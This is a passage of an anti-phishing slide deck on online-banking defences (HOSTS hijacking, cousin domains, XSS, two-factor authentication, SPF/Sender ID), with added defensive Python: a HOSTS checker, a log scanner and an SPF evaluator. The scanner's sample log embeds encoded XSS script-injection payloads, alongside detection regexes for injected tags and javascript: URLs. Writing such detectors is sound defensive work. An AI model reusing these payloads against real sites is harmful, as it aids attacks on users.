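WATCHLIST = {'www.pisabank.com', 'pisabank.com'}

def parse_hosts(text):
    """Yield (ip, hostname) pairs from HOSTS-file text; comments and blank lines are skipped."""
    for line in text.splitlines():
        line = line.split('#', 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            yield ip, name.lower()

def classify(ip):
    """How a HOSTS entry changes name resolution for the user."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return 'malformed'
    return 'sinkholed' if addr.is_loopback else 'redirected'

def hijacked_entries(text, watchlist):
    """Report every watch-listed name that HOSTS would resolve locally.

    The HOSTS file wins over DNS, so any such entry bypasses the bank's real address:
    a loopback address only blocks the site, any other address sends the user elsewhere."""
    return [(name, ip, classify(ip)) for ip, name in parse_hosts(text) if name in watchlist]
```

A legitimate HOSTS file on an end-user PC normally carries no entry for a bank at all, so every hit is worth raising.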
• 93. Defense Strategies: At end user side
• NEVER follow any link in an e-mail, posted article, chat room, ICQ message or banner advertisement
• Enable your personal firewall to allow only necessary traffic through
• Keep your software (mail reader, web browser, virus definitions) patched and updated
• Use the PKI properly
• 94. Defense Strategies: At server side
• Make sure the web programs are fully tested, e.g. input parsing and invalid input handling
• Monitor any cousin domain created
• Monitor any phishing e-mail or posted message targeting your organization in major search engines and your honeypot accounts
• Monitor your web server log and identify any suspicious web pages from the referer information
• Provide a secure web proxy service for customers. This web proxy can connect only to the legitimate web sites and nothing else
• Provide secondary authentication for transactions, e.g. send a one-time password to the client through mobile SMS
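As an added example (not from the PISA slides), the Python script below applies two of the server-side detection points to a constructed set of combined-format access log lines: the XSS review of the access log from slides 78 and 79, and the referer check from slide 94. The bank host name, the look-alike domain and the sample lines are assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Apache "combined" format: client ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?')
# Fragments that do not belong in a banking site's query string: injected tags (the slides show
# <script> and </form><form ...>), inline event handlers such as onsubmit=, and javascript: URLs.
XSS_MARKERS = re.compile(r'<\s*/?\s*(script|form|iframe|img)\b|\bon[a-z]+\s*=|javascript:', re.I)

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so a double-encoded payload (%253C -> %3C -> <) is exposed."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def findings_for(match, own_hosts):
    """Findings for one parsed line: XSS markers in the request, or a Referer from a foreign host."""
    findings = []
    if XSS_MARKERS.search(decode_fully(match.group('target'))):
        findings.append('xss-marker in request')
    referer = match.group('referer') or '-'
    host = (urlsplit(referer).hostname or '').lower() if referer != '-' else ''
    if host and host not in own_hosts:      # a bogus page linking to us or hot-linking our images
        findings.append('foreign referer ' + host)
    return findings

def scan_log(lines, own_hosts):
    """Return [(client_ip, finding), ...]; clean lines and unparseable lines contribute nothing."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            hits.extend((m.group('ip'), f) for f in findings_for(m, own_hosts))
    return hits

OWN_HOSTS = {'www.pisabank.com'}   # the bank's own host name as used on the slides (assumption)
# Constructed sample log (not from the slides): line 1 = IDS slide's payload URL-encoded, line 2 = same
# payload double-encoded, line 3 = look-alike domain hot-linking the logo, line 4 = ordinary visit.
SAMPLE_LOG = [
    '192.168.1.152 - - [21/Oct/2004:23:04:54 +0800] "GET /banklogin.jsp?err=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E HTTP/1.1" 200 4058 "-" "Mozilla/4.0"',
    '192.168.1.152 - - [21/Oct/2004:23:05:10 +0800] "GET /banklogin.jsp?err=%253Cscript%253Ealert(1)%253C/script%253E HTTP/1.1" 200 4058 "-" "Mozilla/4.0"',
    '10.0.0.7 - - [21/Oct/2004:23:06:00 +0800] "GET /images/logo.gif HTTP/1.1" 200 2210 "http://www.pisa-bank.example/login.htm" "Mozilla/4.0"',
    '10.0.0.8 - - [21/Oct/2004:23:06:30 +0800] "GET /banklogin.jsp?serviceName=PisabankCaastAccess HTTP/1.1" 200 4058 "http://www.pisabank.com/" "Mozilla/4.0"',
]
```

Referer is client-supplied and can be blanked, so a foreign referer is evidence of a bogus page, while its absence proves nothing.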
• 95. Defense Strategies: At system and network admin side
• Deploy anti-spamming and anti-virus measures, e.g. black/white lists, keyword lists, semantic analysis, various rules and characteristics, Bayesian filtering, challenge-response filtering, SMTP session verification, TurnTide anti-spam router, etc.
• Deploy Firewall, Intrusion Detection System and Intrusion Prevention System to block attacks and Trojan backdoor connections
• Put all non-server machines in private IP networks
• Educate the users and make sure they stay with the updated software patches
At the software vendor side
• Do not assume users have the security knowledge or awareness to use their products safely and wisely
• Do not lower the security level in their products' default settings
• Don't just make money. Spend more time fixing bugs and fully testing the product
• 96. The Picture of Trust
  [Slide figure: layered diagram with columns Client / IT Infrastructure / Server; labels recovered from the slide:]
  – Perception: Social engineering; Look and Feel (Cousin URL); Message and Tone (Face Lift); Trust Branding; Trust Physical Settings
  – Application: XSS Vulnerabilities; Visual Spoofing (Browser); Email Sender Validation; Certificate & Revocation; Chain of Trust; CA Weak Operation?; Weak Operational Security Validation
  – Transport (Host): SSL; MITM
  – Network (Internet): DNS, Hosts file; Network Routing; DNS poison; MITM
  – Link (LAN): ARP Sniffing; Link Resolution
• 97. Defense Strategies
• Policy and User Education
• Prevention
• Detection
• Incident Response and Collaboration
• 98. 3.1 Policy and User Education
• HKMA Guideline
  – Circular on monitoring Online Banking
• Regulation of bogus web sites
  – Regulating the use of domain names
    • HKMA and HKIRC cooperate in regulating the use of the words “bank” and “banque” in “.hk” domains
    • Is a further regulation to mandate all authorized banking institutions to use “.bank.hk” a useful strategy?
    – Note: it still cannot stop techniques like “Visual Spoofing”
• Human is the weakest link
  – Trusts too easily
• 99. 3.1 User Education
• Consumer Education
  – Pamphlet “Internet Banking – Keeping Your Money Safe”
    • by HKAB (Hong Kong Association of Banks) http://www.hkab.org.hk/PDF/customer_info/ebanking_e.pdf
  – TV and radio programmes
    • by HKMA and HKPF
  – Public seminars
    • by HKCERT
  – Alerts on some bank web sites
• 100. 3.2 Prevention (Technical)
• HKMA announced in June 2004 that within 12 months, all authorized institutions should deploy two-factor authentication in high risk transactions
  – One-time password (e.g. secure ID token, SMS one-time password)
  – Digital certificate in Smart ID Card
• 101. 3.2 Other Prevention & Detection
• See previous sections on specific attacks
• 102. 3.4 Incident Response and Collaboration
• Report and Alert
  – SFC (Securities and Futures Commission) rewards the reporting of fraudulent copycat websites and phishing scams targeting Hong Kong investors
    • Smart Investor Award http://www.hksfc.org.hk/eng/investor/html/smart_investor_award.htm
  – HKMA and SFC publish lists of unregistered financial and stock transaction web sites
    • http://www.hkma.gov.hk
    • http://www.hksfc.org.hk/chi/investor/html/unlicensed_overseas_comp.htm
  – Quick reaction and publishing of news in the media and press to alert the public
• 103. 3.4 Incident Response and Collaboration
• Local Collaboration
  – Police, HKCERT and ISPs cooperate to close down bogus web sites in Hong Kong
  – Police, HKMA and HKAB have a standing collaboration body, meeting regularly on banking fraud prevention and response
• 104. 3.4 Incident Response and Collaboration
• Cross Border Collaboration
  – Police plays an important role in cross-border crimes like phishing
  – CERT teams around the world are developing close collaboration in information exchange and in pinning down bogus websites
  [Slide figure: world map of CSIRTs (Global / Asia Pacific), http://www.cert.org/csirts/images/map-full.gif]
• 105. 3.5 Long Term Development (Technology Infrastructure): PHISHING & SPAM
• One of the core issues: how to validate the identity of the sender and the sender domain, and whether the sending mail server is authorized?
• In the current Internet mail infrastructure implementation, there is a flaw in the validation of the sender
• Plausible but not widely implemented methods of validation
  – Sender Validation
    • Use digital signatures (S/MIME or PGP)
  – Authenticated SMTP to minimize abuse of open mail relays
    • RFC 2554 - SMTP Service Extension for Authentication
    • RFC 2487 - SMTP Service Extension for Secure SMTP over TLS
• 106. 3.5 Long Term Development (Technology Infrastructure)
• Domain Validation (works at DNS level)
  – Standards based
    • Reverse DNS Lookup
  – Proprietary solutions
    • AOL: SPF / Sender ID
    • Microsoft: Caller ID
    • Yahoo: DomainKeys
• 107. Sender Policy Framework (SPF)
  [Slide figure: message flow between Sender, Sender Mail Server, DNS server of SENDER.COM, Recipient Mail Gateway and Recipient]
  1. Sender sends out email from SENDER.COM (SMTP)
  2. Recipient Mail Gateway issues a DNS query to the DNS server of SENDER.COM, asking for the list of authorized IP addresses of mail servers
  3. DNS server returns a list of authorized IP addresses of mail servers for SENDER.COM
  4. Check if the Sender Mail Server is in the authorized IP address list. If so, the mail server is authorized and the mail is forwarded to the recipient's mailbox
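Added example, not part of the PISA slides: a minimal SPF evaluator in Python that follows steps 2 to 4 of the diagram against a constructed DNS table (the domains, records and addresses are assumptions). It checks the envelope sender domain (MAIL FROM), models only the ip4, ip6, include and all mechanisms, and returns the result the gateway acts on in step 4.

```python
import ipaddress

# Constructed stand-in for the DNS lookups of steps 2 and 3 (not real domains or records):
# domain -> published SPF TXT record.
FAKE_DNS = {
    'sender.com': 'v=spf1 ip4:203.0.113.0/24 include:_spf.mailhost.example -all',
    '_spf.mailhost.example': 'v=spf1 ip4:198.51.100.25 ip6:2001:db8::/32 ~all',
}
RESULT = {'+': 'pass', '-': 'fail', '~': 'softfail', '?': 'neutral'}

def check_spf(domain, client_ip, dns, depth=0):
    """Evaluate the SPF record of `domain` for the connecting mail server `client_ip` (step 4).

    `domain` is the envelope sender (MAIL FROM) domain, not the From: header the user sees.
    Only ip4, ip6, include and all are modelled; a, mx, ptr and exists are treated as no match."""
    record = dns.get(domain.lower())
    if depth > 10 or record is None or not record.startswith('v=spf1'):
        return 'none'                            # no usable policy: the gateway cannot decide
    ip = ipaddress.ip_address(client_ip)
    for term in record.split()[1:]:
        qualifier = term[0] if term[0] in RESULT else '+'
        name, _, arg = term.lstrip('+-~?').lower().partition(':')
        if name in ('ip4', 'ip6'):
            try:
                if ip in ipaddress.ip_network(arg, strict=False):   # v4 vs v6 mismatch is False
                    return RESULT[qualifier]
            except ValueError:
                continue                             # malformed network: mechanism does not match
        elif name == 'include' and check_spf(arg, client_ip, dns, depth + 1) == 'pass':
            return RESULT[qualifier]
        elif name == 'all':
            return RESULT[qualifier]
    return 'neutral'                                 # record exhausted without a match

def gateway_action(domain, client_ip, dns):
    """What the recipient mail gateway does with the connection, given the SPF result."""
    result = check_spf(domain, client_ip, dns)
    if result == 'pass':
        return 'forward to mailbox'
    if result == 'fail':
        return 'reject'
    return 'accept but mark as unverified'       # softfail / neutral / none: no proof either way
```

A pass only says the connecting server may send for that domain; a phisher who registers a cousin domain and publishes his own SPF record passes too, which is why the slides pair SPF with user education and cousin-domain monitoring.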
• 108. Proprietary Domain Validation
• Caller ID
  – “XML version of SPF” with more options
• DomainKeys
  – Uses PKI. Validates sender identity AND message integrity
• Recent Development
  – DomainKeys was submitted as an RFC to the IETF
  – SPF merged with Caller ID into Sender ID
  – Sender ID was submitted to the IETF as an RFC in July 2004; it was rejected in Oct 2004 due to compatibility and IP issues. Microsoft has re-submitted it with amendments. The industry is still discussing the new amendment.
• 109. 3.5 Long Term Development (Legislation): PHISHING & SPAM
  – Legislate on cross-border jurisdiction, and establish a mutually accepted process to handle phishing and spamming
  – Legislate against spam, to reduce Open Mail Relays and Directory Harvesting Attacks
• 110. Conclusion
• Phishing adversely impacts the growth of e-Commerce
• Phishermen are now using both old social engineering tricks and more advanced technologies.
• Should adopt multi-dimensional anti-phishing strategies
  – User Education, Prevention, Detection, Incident Response and Notification
  – Collaboration of law enforcement and the business sector, and across borders, are vital elements of success.
• Hitting SPAM also hits Phishing. There is a need for legislative and technological reforms.